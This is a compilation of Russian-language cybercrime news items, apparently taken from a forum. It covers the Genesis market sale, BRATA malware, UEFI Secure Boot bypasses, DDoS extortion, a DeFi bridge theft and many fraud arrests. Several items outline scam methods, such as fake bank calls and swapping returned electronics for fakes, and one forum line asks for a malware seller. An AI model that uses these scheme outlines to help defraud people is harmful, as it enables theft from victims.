Хакерская группировка, стоящая за даркнет-маркетплейсом Genesis, заявила, что платформу продали неназванному покупателю. Интересно, что всего три месяца назад власти США наложили санкции на Genesis Market, конфисковали некоторые из его доменов и утверждали, что получили доступ к бэкэнду.
Genesis запустился в конце 2017 года и уже к 2020 году стал одним из
популярнейших маркетплейсов.
В основном на Genesis продавали учетные данные (в том числе для Gmail,
Netflix, Spotify, WordPress, PayPal, Reddit, Amazon, LinkedIn, Cloudflare,
Twitter, Zoom, Ebay и так далее) файлы cookie и так называемые фингерпринты
(цифровые отпечатки, боты, а говоря проще — готовые виртуальные личности) для
различных устройств.
Genesis предоставлял клиентам собственный браузер Genesis Security, который
преступники могли использовать для импорта приобретенных фингерпринтов и
выдавать себя за жертв, используя их IP-адреса, cookie сеансов, информацию об
ОС и установленных плагинах.
Правоохранительные органы считают, что с 2018 года администраторы маркетплейса
заработали более 8,7 млн долларов.
На апрель 2023 года на Genesis продали более 1,5 млн фингерпринтов (более 2
000 000 похищенных личностей).
В конце июня на хакерских форумах появилось сразу несколько сообщений о продаже Genesis, написанных аккаунтом GenesisStore, который ранее публиковал посты от лица администрации маркетплейса.
Эти сообщени гласили, что продаются «все наработки, включая полную базу данных (кроме некоторых деталей клиентской базы), исходные коды, скрипты», а при «определенной договоренности» даже серверная инфраструктура.
[](https://xakep.ru/wp- content/uploads/2023/07/429784/GenesisMarket_sale_post.jpg)
На прошлой неделе этот же аккаунт заявил на хак-форуме Exploit, что депозит внесен, маркетплейс продан и «будет передан новому владельцу в следующем месяце». Также в сообщении отмечается, что аккаунты на форумах не будут переданы новому владельцу, и он создаст новые «если потребуется».
[](https://xakep.ru/wp- content/uploads/2023/07/429784/genesis_store_968542d229.jpg)
Продажа Genesis происходит спустя всего несколько месяцев после масштабной операции Cookie Monster, в которой принимали участие правоохранительные органы 17 стран мира, и которую координировало ФБР.
В апреле текущего года Европол, ФБР и Министерство юстиции США сообщали, что им удалось получить доступ к бэкэнду ресурса и данным 59 000 учетных записей пользователей, раскрыв настоящие личности многих из них. В итоге ходе этой операции было произведено 119 арестов и 208 обысков.
Тогда же все три домена Genesis в открытом интернете были заменены специальной «заглушкой», информирующей пользователей о том, что теперь домен находится под контролем ФБР. Также все домены (наряду с .onion-доменом, который не перешел под контроль властей) были включены в санкционный список Министерства финансов США, в котором Genesis значится как базирующийся в России.
[](https://xakep.ru/wp- content/uploads/2023/07/429784/GenesisMarket_LE_banner.jpg)
«Я очень удивлен, что кто-то захотел купить полностью сожженный бренд, — [комментирует](https://therecord.media/genesis-market-sold-despite-fbi- operation) специалист Recorded Future Дмитрий Смилянец. — Есть вероятность, что сами операторы [Genesis] предприняли этот шаг, чтобы облегчить себе ребрендинг и отделиться от подсанкционной организации».
Click to expand...
Сотрудники уголовного розыска Центрального РУВД задержали 16-летнего учащегося столичного колледжа , который забирал деньги у пенсионеров, обманутых телефонными аферистами.
Установлено, что предложение о "подработке" курьером задержанный нашел в тематической группе мессенджера. По заданию куратора он забирал у пожилых минчан деньги, которые в дальнейшем передавал посреднику.
_За 4 дня фигурант посетил 9 адресов, где обманутые пенсионеры передали ему
свыше 75 тысяч долларов США в эквиваленте.
_
_Так, одна из потерпевших отдала курьеру 27 тысяч долларов США.
_
Следователями в отношении задержанного возбуждены уголовные дела за
мошенничество.
**Напоминаем: лица, выполняющие роли курьеров, наравне с другими участниками
преступных схем отвечают по закону, а также несут обязанность по возмещению
материального ущерба, причиненного потерпевшим.
**
Комментирует начальник отдела УУР ГУВД Минска Андрей Арловский.
source: t.me/police_minsk/6723
Переписка в мессенджерах стала ключевым доказательством в 19% уголовных дел.
Переписка в мессенджерах становится ключевым доказательством почти в 20% уголовных дел, рассматриваемых в российских судах, сообщили эксперты компании экспертиз в сфере информационных технологий и права RTM Group.
В первую очередь это уголовные дела о продаже наркотиков, взяточничестве или вымогательстве, поскольку переписка из мессенджеров фиксирует договоренности между сторонами.
Также переписка широко применяется в гражданских, особенно семейных, спорах, реже — в арбитражных судах, рассказали в компании.
По сравнению с 2020 годом использование электронной переписки как доказательства в уголовных делах выросло на 20%, а в гражданских делах за тот же период — более чем на 100%.
Эксперты отмечают, что если переписка информативна, то она в 99% случаев она будет принята во внимание судом. Однако к такому виду доказательства предъявляются строгие требования: видимость даты создания, изменения и форма представления.
source: ria.ru/20221110/messendzhery-1830393190.html
По информации Bleeping Computer, администратор баз данных по имени Хань Бинг (Han Bing), который работал в китайской компании Lianjia, приговорен к 7 годам тюремного заключения за незаконный вход в корпоративные информационные системы под root и безвозвратное удаление баз данных компании, включая информацию на резервных площадках, с помощью команд rm и shred.
Инцидент произошел летом 2018 года, но следствие по нему закончилось совсем недавно.
Хань Бинг работал администратором баз данных в крупнейшей китайской компании, занимающейся операциями с недвижимостью. По личным мотивам и после угрозы увольнения из-за слишком ретивого и настойчивого обращения к руководству по поводу плохой информационной защищенности баз данных, Бинг решился на ряд действий, которые стоили компании больших временных и денежных затрат на восстановление деятельности.
Бинг в течение некоторого времени использовал свои административные привилегии и учетную запись root для доступа к финансовой информационной системе компании и удалении всех сохраненных там данных с двух серверов баз данных и двух серверов приложений.
Это привело к немедленному прекращению значительной части финансовых и рабочих операций в Lianjia. Десятки тысяч сотрудников компании прекратили работать, их финансовые ведомости были удалены, они остались без зарплаты на длительный период. Компании пришлось срочно обратиться к сторонним организациям для помощи по восстановлению данных. Это обошлось Lianjia примерно в $30 тыс.
Косвенный ущерб от нарушения деятельности фирмы, однако, был гораздо больше, поскольку Lianjia управляет тысячами офисов, работает с более чем 120 тыс. брокеров, владеет 51 дочерней компанией, а ее рыночная стоимость оценивается в $6 млрд.
Согласно документам, опубликованным следователями китайской народной прокуратуры, Бинг был одним из пяти главных подозреваемых в деле о массовом удалении данных компании.
Нерадивый администратор Бинг сразу же вызвал подозрения у правоохранительных органов, когда отказался сообщить следователям и представителям ИБ-службы компании пароль от своего рабочего ноутбука, который он использовал также дома.
Бинг утверждал, что на его ноутбуке были личные данные, а пароль он предоставит только представителям государственных органов и разрешит ввести его только самому при условии присутствия при проверке ноутбука.
Следователи в суде пояснили, что Бинг ранее смог удалить все улики с ноутбука, поэтому проводили внешние проверки для оценки реакции пяти сотрудников, имевших доступ к системе, а также анализировали логи соединений, включая временные метки и записи с камер наблюдения.
Технические специалисты в рамках расследования извлекли журналы доступа с серверов компании и отследили активность пользователей в момент атаки до определенных IP-адресов и MAC-адресов. ИБ-инспекторы извлекли журналы подключений Wi-Fi и временные метки всех сессий, что в конечном итоге по сумме улик подтвердило виновность Бинга. Против него также были записи с камер видеонаблюдения, которые зафиксировали его активность в это время с ноутбуком.
Судебный IT-эксперт пояснил, что Бинг в процессе атаки активно использовал команды shred и rm для быстрого и безвозвратного удаления элементов баз данных компании.
Примечательно, что Бинг перед этим неоднократно сообщал своему работодателю и руководителям о пробелах в безопасности финансовой системы. Он даже рассылал электронные письма другим администраторам, чтобы выразить свою обеспокоенность в неработающей должным образом системе защиты.
Анализ его переписки показал, что все начальники игнорировали его опасения, а руководитель его отдела несколько раз отвергал проект по IT-безопасности, который Бинг предлагал запустить в компании.
После этого администратор Бинг предупреждал вышестоящее руководство, что его организационные предложения не ценятся прямым начальством. Он также часто вступал в споры со своими руководителями, но они ни к чему не приводили, кроме обратного давления на Бинга. В итоге он, как сознательный сотрудник, не сдержался и решился на незаконную деятельность, чтобы показать свою правоту.
Аналогичный случай произошел в мае 2021 года. Тогда уволенный сотрудник кредитного союза Нью-Йорка в отместку удалил более 21 ГБ данных клиентов и смог некоторое время просматривать отчетные документы компании. Причем он это сделал спустя двое суток после окончания официальной процедуры оформления документов о завершении работы в компании. Это произошло по вине техподдержки, которая не удалила его учетную запись из системы после получения тикета о необходимости удаления доступа для уволенного сотрудника.
Вредонос BRATA обзавелся новыми и опасными функциями, включая GPS-трекинг, использование нескольких каналов связи, а также сброс всех настроек устройства для удаления любых следов вредоносной активности.
BRATA был впервые обнаружен «Лабораторией Касперского» еще в 2019 году, и тогда он в основном атаковал бразильских пользователей. В декабре 2021 года, уже в [отчёте](https://www.cleafy.com/cleafy-labs/mobile-banking-fraud-brata- strikes-again) компании Cleafy, сообщалось, что малварь теперь активна и в Европе, где атакует пользователей электронного банкинга и ворует их учетные данные при участии мошенников, выдающих себя за специалистов службы поддержки банка.
Аналитики Cleafy продолжили следить за новыми функциями BRATA и теперь, в [новом отчёте](http://www.cleafy.com/cleafy-labs/how-brata-is-monitoring-your- bank-account) рассказывают, что малварь продолжает развиваться.
Последние версии малвари нацелены на пользователей электронных банкингов в Великобритании, Польше, Италии, Испании, Китае и Латинской Америке. Каждый вариант BRATA ориентирован на разные банки и содержит разные оверлеи, языки и даже срывается в разных приложениях, предназначенных для разной целевой аудитории.
Авторы вредоноса используют во всех версиях похожие методы обфускации, включая упаковку файла APK в зашифрованный пакет JAR или DEX. Это помогает успешно обманывать антивирусы, что наглядно демонстрирует проверка VirusTotal.
Перед извлечением данных BRATA пытается найти и завершить процессы антивирусных приложений, список которых можно найти на скриншоте соответствующей функции.
Среди новых функций, обнаруженных исследователями Cleafy, числятся кейлоггер с возможностью делать скриншоты; GPS-трекинг (хотя его назначение пока осталось для аналитиков загадкой); новые каналы связи для обмена данными с управляющим сервером (появилась поддержка HTTP и WebSockets); а также выполнение сброса устройства к заводским настройкам. К последнему хакеры прибегают в случаях, когда компрометация девайса успешно завершена и учетные данные уже украдены, или когда приложение обнаружило, что работает в виртуальной среде, то есть его пытаются изучить.
В сущности BRATA использует сброс к заводским настройкам в качестве аварийного «рубильника» для самозащиты, но при этом уничтожает все данные пользователя, практически без возможности восстановления.
Полиция Гонконга расследует инцидент невыплаты ряда трейдерам депозита, переведенного в декабре на биржу криптовалют CoinSuper. Журналисты Bloomberg провели собственное расследование, результаты которого показывают потерю платежеспособности площадки с ноября прошлого года.
На данный момент речь идет про незначительные потери трейдеров, оцениваемые в $55 тысяч, но компания перестала отвечать на вопросы пострадавших клиентов в официальных чатах Telegram.
Суточный оборот биржи CoinSuper составляет $11 млн, что указывает на возможно существенный финансовый ущерб в случае подтверждения проблем с расчетами у компании. Bloomberg пыталась связаться с руководством, но не получила от них ответа, как и внятных комментариев от правоохранительных органов Гонконга по этому делу.
Вероятный скам криптобиржи, может дать китайским властям провести зачистку в автономии, последнем пристанище для торговли цифровыми активами. На материковой части КНР оборот криптовалют был запрещен в 2017-м году, в 2021-м году страна официально избавилась от майнеров.
Падение CoinSuper негативно повлияет на весь бизнес централизованных бирж. Компания была создана бывшим президентом UBS China Inc. Кареном Ченом, в нее были вложены инвестиции Pantera Capital и других известных венчурных капиталистов.
Разработчики Monero выложили на официальном саббредите соцсети Reddit предупреждение про найденную уязвимость мультиподписи. Multisig-транзакции кошелька Monero позволяют отправлять транзакции только после их подписи определенным кругом лиц или заданным пороговым значением подписантов.
Найденный баг позволяет одному из владельцев набора ключей взаимосвязанных кошельков, вывести XMR без наличия подписи других участников.
Разработчики просят владельцев Monero Multisig не предпринимать никаких действий до выпуска обновления. Проблема касается только текущего кода кошелька, а не принципиальной схемы совместного управления депозитами.
Баг не влияет на процесс создания multisig-кошелька, но от отправки совместных транзакций следует отказаться на время. Разработчики призывают не подписывать запросы на переводы депозита, отказаться от сервисов, где мультиподпись используется в качестве арбитража, например, в p2p-сделках и межатомарных свопах.
Используя уязвимости вебсайта турагентства, фигурант завладел базой данных клиентов. За содеянное правонарушителю грозит до трех лет заключения.
Противоправную деятельность 26-летнего местного жителя разоблачили сотрудники киберполиции Винницкой области совместно со следственным отделом Винницкого районного управления полиции области.
Мужчина, используя уязвимости вебсайта местного туристического агентства, несанкционированно скопировал клиентскую базу. На сайте компании содержались сведения относительно номеров телефонов, ФИО граждан, места регистрации, ссылки на учетные записи в соцсетях, а в отдельных случаях - копии документов, удостоверяющих личность.
База данных содержала информацию об около 100 тысяч человек. Сведения с незаконно полученной базы правонарушитель распространял третьим лицам.
Правоохранители провели обыски по месту жительства и регистрации фигуранта. По результатам которых изъяли компьютерную технику, мобильные телефоны и накопители данных. Изъятое будет направлено на проведение соответствующих экспертиз.
По данному факту открыто уголовное производство по ч. 1 ст. 361 (Несанкционированное вмешательство в работу компьютеров, автоматизированных систем, компьютерных сетей или сетей электросвязи) Уголовного кодекса Украины. Санкция статьи предусматривает до трех лет лишения свободы. Решается вопрос об объявлении фигуранту о подозрении.
Следственные действия продолжаются.
• Video:
Подозреваемые действовали по схеме «поступил платеж от юридического лица». Пострадавших фигуранты подыскивали на Интернет-платформах объявлений. За содеянное фигурантам грозит до 12-ти лет заключения.
Группу злоумышленников разоблачили сотрудники отдела противодействия киберпреступлениям в Херсонской области совместно со следователями отдела полиции № 2 Херсонского районного управления в апреле этого года.
Установлено, что фигуранты действовали по четко распределенным ролям. Двое мужчин на Интернет-платформах искали объявления о продаже товаров. Они звонили продавцам, имитируя желание совершить покупку. Далее уверяли продавцов, что уже осуществили оплату.
Через некоторое время злоумышленники вновь звонили продавцам, выдавая себя за работников банка. Гражданам сообщали, что на их карточку якобы поступил перевод от юридического лица. Однако по регламенту банка такие действия запрещены, поэтому карты заблокированы.
Потерпевшие выполняли рекомендации злоумышленников для «разблокирования банковской карты». Однако в итоге - деньги с банковских счетов граждан исчезали.
Обналичивать деньги им помогала жительница Херсона. Установлено, что таким образом они обманули граждан на четверть миллиона гривен.
Сейчас фигурантам сообщили о подозрении по ч. 4 ст. 190 (Мошенничество) Уголовного кодекса Украины. Им грозит до 12-ти лет заключения с конфискацией имущества. Досудебное расследование в уголовном производстве завершено. Обвинительный акт в отношении участников организованной группы направлен в суд.
• Source: [https://www.npu.gov.ua/news/kiberzl...ivlasnennya-chverti-miljona- griven-gromadyan/](https://www.npu.gov.ua/news/kiberzlochini/na-xersonshhini- suditimut-uchasnikiv-organizovanoji-grupi-za-privlasnennya-chverti-miljona- griven-gromadyan/)
<https://cyware.com/news/steamhide-malware-hides-inside-steam-profile-images- cbe5632c>
Anyone know seller?
Турецкие СМИ сообщили о масштабном мошенничестве с участием главного мемкоина Dogecoin на сумму в 1 миллиард лир, эквивалентную 120 миллионам долларов.
После криптобума за последние годы на рынок пришло много начинающих инвесторов, не готовых к тому, что их желание как можно быстрее заработать на новом классе активов может сыграть на руку злоумышленникам. Одним из таких был турецкий мошенник, скрывающийся под ником Turgut V.
Как и в большинстве подобных историй, обманутым инвесторам пообещали быструю прибыль в 100% всего за 40 дней с момента вложения в майнинг Dogecoin. Многие, кто хорошо знаком с индустрией наверняка удивились, что в такие “обещания” в принципе по-прежнему кто-то верит. К сожалению, таких людей оказалось не один и не два человека, а целых 1500. Сумма токенов DOGE, которую они доверили мошеннику составляла 350 миллионов Dogecoin, эквивалентных 1 миллиарду турецких лир или 120 миллионам долларов.
Turgut V сообщил своим инвесторам, что внесенные ими депозиты в DOGE будут использованы для майнинга, пообещав приумножить состояние в кратчайшие сроки. Поначалу прибыль действительно росла, а сам злоумышленник вместе с командой регулярно связывался со вкладчиками в Telegram и Zoom, чтобы убедить в росте инвестиций и честности намерений. Однако, после четырех месяцев бурной деятельности, проект был внезапно закрыт, впрочем, как и связанные с ним аккаунты в соцсетях, а все средства украдены злоумышленником и его одиннадцатью подельниками.
Молчание длилось до тех пор, пока обманутые инвесторы не обратились к адвокатам, а те в правоохранительные органы. Узнав о произошедшем, генеральная прокуратура стамбульской провинции Кючюкчекмедже начала расследование инцидента, выйдя на самого горе-бизнесмена. Как оказалось, мошенническим проектом управляло сразу двое людей, еще трое были менеджерами, один из которых отвечал за все поступившие на счет денежные средства.
Результатом для Turgut V стал запрет на выезд и судебное разбирательство в ходе которого будет вынесен приговор. Что же касается остальных участников, то их мера пресечения пока не была озвучена.
• Source: [https://www.tv100.com/1-milyar-lira...para-dolandiriciligiyla- sarsildi-haber-566468](https://www.tv100.com/1-milyar-liralik-kripto-para- vurgunu-turkiye-yeni-bir-kripto-para-dolandiriciligiyla-sarsildi-haber-566468)
Как преступники эффективно объединяют цифровые и физические методы мошенничества.
Недавно Европол задержал 54 человека, связанных с мошенничеством с использованием голосового фишинга (вишинга), который сопровождался тактиками социальной инженерии и физическими угрозами.
Мошенники выдавали себя за сотрудников банков, звонили пожилым гражданам Испании и получали их личную информацию. Затем их сообщники лично посещали жертв, требуя наличных денег, кредитных карт и драгоценностей. В результате деятельности преступников нанесён суммарный ущерб в размере 2,7 миллиона долларов.
Абу Куреши, руководитель отдела анализа угроз компании BforeAI, отметил, что уникальность этой мошеннической деятельности заключается в сочетании цифровых и физических методов. Обычно мошенничество ограничивается кражей цифровых активов, таких как пароли или данные кредитных карт. В данном же случае преступники перешли на новый уровень, лично посещая жертв и обманывая их для получения желаемого.
Физические методы социальной инженерии усиливают эффективность вишинг-атак, добавляя элемент личного взаимодействия, который повышает доверие и снижает скептицизм жертв. Преступники создают чувство срочности и используют доверие к официальным представителям, что позволяет им более эффективно манипулировать своими целями.
Стивен Ковски, директор по технологиям безопасности электронной почты в компании SlashNext, подчеркнул масштаб и сложность операции, которая привела к множеству арестов в разных странах и значительным финансовым потерям. Использование call-центров и подражание банковским сотрудникам демонстрирует, как эволюционировали вишинг-тактики, становясь всё более убедительными и целенаправленными.
Ковски добавил, что старые методы вишинга вновь набирают популярность, так как они эксплуатируют психологию человека и доверие, что сложно предотвратить техническими средствами. По мере улучшения безопасности электронной почты, злоумышленники перешли к голосовым каналам, где жертвы могут быть менее бдительны.
Массовый переход людей на удалённую работу также создал новые возможности для вишинг-мошенников. Финансовые потери, утечки данных и компрометация информации клиентов являются основными угрозами, которые могут также нанести ущерб репутации компании и подорвать доверие клиентов. Компании могут столкнуться с регуляторными штрафами и юридическими последствиями за попадание под атаку социальной инженерии.
Ковски рекомендует организациям проводить регулярные тренинги по повышению осведомлённости о безопасности, включая реалистичные вишинг-симуляции. Кроме того, внедрение передовых технологий для обнаружения голосовых угроз и автоматического фильтрации вызовов также может помочь защитить уязвимых пользователей. Ещё очень важно — создать культуру, в которой сотрудники смогут без страха сообщать о подозрительных звонках руководству, не боясь ответственности за потенциально неверные действия со своей стороны.
europol.europa.eu/media-press/newsroom/news/call-blocked-hard-and-fast-action- against-54-spanish-phone-fraudsters
В Республике Татарстан сотрудники уголовного розыска совместно с участковыми уполномоченными Отдела полиции № 15 «Танкодром» Управления МВД России по г. Казани установили и задержали 20-летнего местного жителя, подозреваемого в серии мошенничеств при возврате товаров, которые он покупал через маркетплейс.
Как предварительно установили полицейские, с октября 2023 года молодой человек создавал на сайте торговой площадки учётные записи, используя незарегистрированные SIM-карты. Посредством таких фейковых аккаунтов он приобретал дорогостоящие брендовые смарт-часы и наушники, доставку которых оформлял в разные пункты выдачи. После получения товаров подозреваемый дома вскрывал коробки и подменял оригинальную электронную технику на поддельные изделия с низкой себестоимостью, которые покупал заранее.
Затем аферист подавал онлайн-заявки на возврат полученных гаджетов, но в пункт выдачи относил их муляжи. После этого маркетплейс возвращал ему ранее уплаченные деньги. Похищенное имущество злоумышленник продавал через сайты бесплатных объявлений.
В настоящее время установлена причастность молодого человека к 33 эпизодам такого мошенничества, а общая сумма причинённого им ущерба составила около 3 млн рублей.
По месту жительства подозреваемого сотрудники полиции обнаружили и изъяли множество единиц похищенных им гаджетов, которые он не успел сбыть, а также их копии.
В отношении гражданина возбуждено уголовное дело по признакам преступления, предусмотренного статьёй 159 Уголовного кодекса Российской Федерации, и на время расследования избрана мера пресечения в виде подписки о невыезде и надлежащем поведении.
Эксперты из компании Eclypsium обнаружили, что ряд сторонних UEFI-бутлоадеров могут использоваться для обхода защиты UEFI Secure Boot, что позволяет злоумышленникам выполнять вредоносный код еще до загрузки операционной системы.
Исследователи напоминают, что Secure Boot является частью спецификации UEFI и призван защитить процесс загрузки ОС, чтобы в его рамках выполнялся только доверенный код, подписанный специальным сертификатом. Специалисты пишут, что сразу три загрузчика UEFI, одобренные Microsoft, имели уязвимости, позволяющие обойти Secure Boot и выполнить неподписанный код:
В настоящее время Microsoft уже разработала и выпустила обновление [KB5012170](http://support.microsoft.com/en-us/topic/kb5012170-security- update-for-secure-boot-dbx- august-9-2022-72ff5eed-25b4-47c7-be28-c42bd211bb15), которое устраняет проблемы в перечисленных загрузчиках. «Это обновление устраняет уязвимость, добавляя сигнатуры известных уязвимых модулей UEFI в DBX», — поясняют в Microsoft.
В отчете Eclypsium отмечается, что используя загрузчики Eurosoft и CryptoPro Secure Disk, злоумышленник может обойти Secure Boot, используя подписанные UEFI-шеллы (esdiags.efi и Shell_Full.efi). При этом подчеркивается, что использование этих уязвимостей можно было легко автоматизировать с помощью скриптов, хотя пользователи могли обратить внимание на эксплуатацию багов.
В случае с загрузчиком New Horizon Datasys атака была бы гораздо более незаметной для пользователей. «Этот загрузчик содержит встроенный обход Secure Boot, который оставляет Secure Boot включенным, но отключает проверки», — пишут эксперты. В итоге эксплуатация CVE-2022-34302 куда проще двух других багов и позволяет отключить Secure Boot, выполнив неподписанный код напрямую. Исследователи предупреждают, что эту проблему наверняка попытаются взять на вооружение хакеры.
Опубликованный CERT Университета Карнеги-Меллона бюллетень безопасности гласит, что код, выполняемый на ранних этапах загрузки, может «также обходить обычные средства защиты на основе ОС и EDR». Эксперты CERT приводят список из 23 поставщиков загрузчиков UEFI, и четкий статус доступен только для трех из них: Microsoft (затронут), Phoenix Technologies (не затронут) и Red Hat (не затронут).
Другие 20 поставщиков были проинформированы о проблемах, но в настоящее время неизвестно, затронуты ли их продукты. В этот список входят такие компании, как Acer, AMD, American Megatrends, ASUSTeK, DELL, Google, Hewlett Packard Enterprise, HP, Lenovo, Toshiba и VAIO Corporation.
Хотя атаки вымогательского ПО затмили вымогательство с помощью DDoS, преступники по-прежнему пользуются этим методом.
Как минимум три провайдера электронной почты в разных уголках мира подверглись мощным DDoS-атакам. В частности, инцидент затронул поставщиков защищенных сервисов электронной почты [Runbox](https://blog.runbox.com/2021/10/runbox-is- under-attack-by-extortionists/) (Норвегия), [Posteo](https://posteo.de/en/blog/important-possible-disturbances-due-to- ddos) (Германия) и Fastmail (Австралия).
Как сообщили представители Posteo в своем блоге, злоумышленники связались с ними и потребовали деньги за прекращение атаки.
"Мы не заплатили сумму, которую они потребовали. Компании ни при каких обстоятельствах не должны позволять преступникам себя шантажировать, в противном случае они станут для них еще более привлекательной жертвой. К тому же, DDoS-атаки обычно не прекращаются, даже если заплатить", - говорится в блоге Posteo.
В Fastmail и Runbox не сообщили, потребовали ли злоумышленники выкуп за прекращения атаки. Тем не менее, похоже, что за ними стоят те же киберпреступники, что и за атакой на немецкого провайдера, и требования выкупа все же имели место. Об этом порталу The Record сообщил осведомленный источник.
В настоящее время все три сервиса восстановили свою работу.
Одновременно с Runbox, Posteo и Fastmail DDoS-атакам также подверглись британский поставщик сервиса VoIP-телефонии Voipfone и провайдер игровых серверов Sparked, однако ответственность за них лежит на других киберпреступниках.
Несмотря на то, что кибератаки с использованием вымогательского ПО затмили вымогательство с помощью DDoS-атак, киберпреступники по-прежнему активно пользуются этим методом. К примеру, в прошлом месяце попытки вымогательства с помощью DDoS-атак были зафиксированы в отношении ряда интернет-провайдеров и финансовых организаций по всему миру, в том числе в России , Великобритании, США и Новой Зеландии. Некоторые из них были осуществлены с использованием ботнета Meris .
Подробнее: https://www.securitylab.ru/news/525892.php
Злоумышленник использовал уязвимость кода и вывел 277 BTC (~$12,7 млн) из кроссчейн-протокола децентрализованных финансов (DeFi) pNetwork.
1/N We're sorry to inform the community that an attacker was able to leverage a bug in our codebase and attack pBTC on BSC, stealing 277 BTC (most of its collateral).
The other bridges were not affected. All other funds in the pNetwork are safe.
— pNetwork (@pNetworkDeFi) September 19, 2021__https://twitter.com/x/status/1439690593211490324
Click to expand...
«Злоумышленник смог использовать ошибку в нашей кодовой базе и атаковать pBTC на BSC, похитив 277 BTC (большую часть обеспечения). Другие мосты не пострадали. Все остальные средства в pNetwork в безопасности», — заявила команда проекта.
Разработчики предложили хакеру награду в $1,5 млн за возврат средств, хотя и посчитали такое развитие событий маловероятным.
«К сожалению, поиск уязвимостей — часть игры, но мы все хотим, чтобы экосистема DeFi продолжала расти. Возврат средств — шаг в этом направлении», — заявили в pNetwork, обращаясь к хакеру.
Позже разработчики сообщили, что подготовили исправление уязвимости и ожидают восстановления работы мостов между сетями в течение «нескольких часов».
Банк России пережил сбой своих электронных систем спустя несколько дней после активизации усилий Роскомнадзора по блокировке VPN.
Банк России пережил сбой своих электронных систем спустя несколько дней после
активизации усилий Роскомнадзора по блокировке VPN и попыток властей
ограничить работу ряда сервисов Google, сообщает
finanz.ru.
«Нестабильная работа» личных кабинетов банков, через которые те
взаимодействуют с ЦБ, начала фиксироваться утром в понедельник, 13 сентября,
сообщает «Интерфакс» со ссылкой на пресс-службу регулятора.
Во вторник проблемы сохранялись и создали трудности для проведения регулярных
операций центробанка по предоставлению рублевых кредитов и размещению
свободных средств банков на депозитах.
Из-за «нестабильной работы» электронных кабинетов ЦБ принял решение принимать
заявки от банков на бумажных носителях и продлил срок их подачи до позднего
вечера - 20.00 мск. Направлять письменные документы нужно было «в
территориальное учреждение Банка России, обслуживающее корреспондентский счет
кредитной организации».
Одновременно были продлены сроки предоставления других электронных документов,
включая отчетность, а также ответы на запросы и предписания ЦБ.
«Проблемы возникли в связи с проводимыми техническими работами», - объясняет
регулятор, добавляя, что восстановление работоспособности личных кабинетов
ожидается в 21.00 мск во вторник.
Подробнее: https://www.securitylab.ru/news/524419.php
В Уссурийске возбуждено уголовное дело в отношении 21-летней местной жительницы.
По версии следствия, в апреле она откликнулась на объявление в Интернете о предложении открыть счёт в банковской организации и передать в пользование банковскую карту. За это ей обещали денежное вознаграждение в размере 2,5 тыс. рублей. Теперь женщине предъявлено обвинение по статье о пособничестве в мошенничестве.
Получившие данные банковского счета обвиняемой использовали их для обналичивания 650 тысяч рублей. Деньги они обманным путем получили от своей жертвы в Подмосковье. Применение в данной схеме банковского счета жительницы Уссурийска стало поводом для предъявления обвинения уже ей самой.
65-летний нижегородец за два года перевел мошенникам почти 9 млн рублей.
В полиции мужчина рассказал, что ему позвонил сотрудник банка и предложил открыть счет для увеличения накоплений.
Тот поверил незнакомцу и продал две квартиры, оформил кредиты в нескольких банках, а также добавил свои личные сбережения. Платежи в итоге продолжались целых два года.
В общей сложности он лишился 8 717 000 рублей.
От взлома соцсетей до pig butchering: что включала в себя образовательная программа?
Полиция Нигерии разоблачила организованную группировку кибермошенников в Абудже, столице страны. 13 сентября 2023 года были задержаны шестеро подозреваемых. Представители закона также разгромили хакерский хаб, который занимался вербовкой и обучением новичков.
По официальным данным, группа базировалась в элитном районе города Дантата и специализировалась на различных видах интернет-афер: от кражи личных данных и взлома аккаунтов в социальных сетях до применения метода «pig butchering» (обмана жертв на сайтах знакомств) и финансовых махинаций с криптовалютой. Свою вину задержанные признали.
Во время обысков в штаб-квартире оперативники изъяли целый арсенал электронных устройств, которые использовались для преступных операций — компьютеры, ноутбуки, мобильные телефоны, внешние накопители. Эксперты уже приступили к их детальному изучению, чтобы найти улики.
Генеральный инспектор полиции Нигерии Олукаёде Эгбетокун призвал общественность, родственников задержанных, друзей и религиозные организации осудить деятельность хакеров и в будущем сообщать властям о любой подозрительной активности в интернете.
На платформе Х (бывш. Twitter) полиция Нигерии обратилась к владельцам квартир и прочих объектов недвижимости с просьбой проинформировать правоохранительные органы, если выяснится, что на подконтрольных им территориях орудуют киберпреступники.
«Нам нужно разрушить стену молчания и разоблачить злодеев в нашем обществе», — говорится в заявлении полиции.
Согласно данным ФБР , опубликованным в мае прошлого года, только по жалобам, поступившим в период с июня 2016 по июль 2019 года, ущерб от мошеннических атак типа BEC (business email compromise) составил 43 миллиарда долларов.
По данным Федеральной торговой комиссии США , в 2021 году от романтических интернет-афер пострадали 70 000 американцев, потеряв в общей сумме 1,3 млрд долларов. А в 2022 году мошенники похитили более 2 млрд долларов с помощью схем типа «pig butchering».
source:
twitter.com/PoliceNG/status/1717201993859490231
ic3.gov/Media/Y2022/PSA220504
ftc.gov/news-events/data-visualizations/data-spotlight/2023/02/romance-
scammers-favorite-lies-exposed
Прокуратура г. Екатеринбурга утвердила обвинительное заключение по уголовному делу в отношении участника преступной группы. Мужчина обвиняется в совершении преступлений, предусмотренных п. «г» ч. 3 ст. 158 УК РФ (кража, группой лиц по предварительному сговору).
По версии следствия, обвиняемый совместно с соучастником, уголовное дело в отношении которого выделено в отдельное производство в связи с розыском, похитил на территории Свердловской и Тюменской областей денежные средства одного из банков на общую сумму в размере свыше 940 тыс. рублей.
Преступления участники группы совершали с использованием на АЗС эмитированных банком расчетных банковских карт в результате создания незапланированного, не предусмотренного банковской системой технического овердрафта (предоставления банком держателю карты средств при отсутствии на банковском счете клиента собственных денежных средств).
Уголовное дело направлено в Ленинский районный суд г. Екатеринбурга для рассмотрения по существу.
Санкция статьи предусматривает в качестве наиболее строгого наказания в виде лишения свободы на срок до 6 лет.
Известный математик и главный научный сотрудник Вычислительного центра РАН не смог вычислить обман — мошенники развели его на три миллиона рублей с помощью старой уловки.
77-летнего Сергея Абрамова, профессора и автора более 130 научных работ, разбудили среди ночи 22 августа. Математику звонил неизвестный мужчина, который сообщил шокирующие новости: его жена стала виновницей серьёзного ДТП. Чтобы её отмазать, нужно было 10 тысяч долларов.
Абрамов послушно собрал деньги, спустился к дому и передал их курьеру. Мужчина почти выдохнул, но через несколько минут раздался новый звонок. Тот же неизвестный сообщил, что у жены математика травма головы, ей требуется трепанация черепа и нужны ещё деньги. Абрамов также послушно спустился и передал два миллиона рублей неизвестному.
Лишь после этого Абрамов догадался позвонить жене и узнал, что никакой аварии не было. Математик пошёл в полицию и написал на мошенников заявление. Ущерб от двух звонков и «ДТП» — три миллиона рублей.
